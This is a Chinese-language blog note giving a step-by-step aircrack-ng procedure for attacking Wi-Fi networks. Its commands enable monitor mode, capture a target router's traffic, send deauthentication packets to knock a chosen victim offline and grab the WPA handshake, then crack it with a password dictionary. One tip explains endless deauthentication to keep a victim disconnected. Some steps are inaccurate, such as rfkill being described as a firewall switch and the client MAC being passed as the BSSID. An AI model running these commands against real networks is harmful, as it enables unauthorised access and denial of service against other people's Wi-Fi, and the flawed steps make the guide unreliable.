首先先提出一些基本概念:
第一個概念是無線網絡的攻擊基本類型:
1.防禦完全無效:悄無聲息安全通過
2.防禦存在障礙:攻擊這種網絡通常情況下需要一個字典,通過字典攻擊拿到基於“有線等效保密協議”和“Wi-Fi保護訪問的預共享密鑰”
WEP:有線等效保密協議
WPA:Wi-Fi保護訪問
WPA-PSK:pre-shared key(Wi-Fi保護訪問下的預共享密鑰)
BSSID:路由器的mac地址
目前我們普遍使用的是WPA2協議支持的Wi-Fi安全機制。就在半個月前樣子,網絡上就曝出了WPA2協議層出現巨大漏洞,導致用戶登錄網站的用戶名和密碼可以被破解獲得,所以WPA2也不再絕對安全了。
我自己的實驗是基於Linux Ubuntu 16.04 操作系統,由於系統搭建在VMWare虛擬機上,所以需要使用外接網卡,我使用的是360無線網卡(市面上隨處可見)但是對於網卡有個硬件要求就是需要支持監聽模式(monitor)並且在多個操作系統上都能運行。如果不支持監聽模式,那麼就無法抓取到受害者的Wi-Fi數據包。
Linux下的工具有很多,在本次實驗中我使用aircrack-ng去抓取數據包並使用字典暴力破解。
第一部分:
安裝aircrack-ng與wireshark,這個很簡單,在Linux命令行下直接輸入這兩個軟件的名字,按照提示使用apt-get即可。
爲了方便,先在命令行輸入:sudo su 輸入用戶密碼獲得管理員權限,這樣後面開啓監聽模式就不會遇到權限不夠等問題。並且使用iwconfig查看是否讀取到網卡的數據,若出現外接網卡的數據說明連接成功。然後點擊右上角圖標將Wi-Fi關閉。
此處的外接360網卡名字爲wlx0087
第二部分:
不廢話直接上指令:
以下是基於Linux操作系統的aircrack-ng操作命令
1. 需要先關閉Wi-Fi,將無線網卡的模式調至monitor
iwconfig wlx0087 mode monitor
2.打開無線網卡的監聽模式
airmon-ng start wlx0087 6
3.kill PID 殺死多餘進程
kill PID pid_num
4.關閉防火牆
rfkill unblock all
5. 使用mon0 -9 是數據包注入測試
aireplay-ng -9 mon0
假設AB:CD:EF:GH:IJ:KL爲路由器的MAC地址,MN:OP:QR:ST:UV:WX爲你要攻擊的用戶MAC地址······
6. 開始抓包,並將數據存儲到output爲名字的文件裏,一般保存在當前目錄
airodump-ng -c 6 --bssid AB:CD:EF:GH:IJ:KL -w output mon0
7. 使用戶掉線重連,用於抓取握手包
aireplay-ng -0 1 -a AB:CD:EF:GH:IJ:KL -c MN:OP:QR:ST:UV:WX mon0
小TIP:此處的命令若改成sudo aireplay-ng --deauth 1/0(0表示無限次) -a AB:CD:EF:GH:IJ:KL(指定基本服務集標識) -c MN:OP:QR:ST:UV:WX(指定目標地址) mon0
deauth後面的參數設置成0,這意味着數據包的無限注入,這樣如果黑客不停止數據包注入,你將永遠連不上自己的Wi-Fi並始終處於掉線模式,經過實驗發現我自己的蘋果手機是可以被攻擊的。
8. 使用字典開始暴力破解
aircrack-ng -w dict.txt -b MN:OP:QR:ST:UV:WX output*.cap
所謂字典dict.txt就是含有衆多密碼的記事本,這個可以去GitHub上進行搜索,也可以自己製作一本。以上就是我進行的Wi-Fi攻擊破解實驗操作步驟,有些地方可能還不完善,希望各位大佬提出意見,我後面也會放入實驗圖片繼續完善這篇博文(小筆記) :)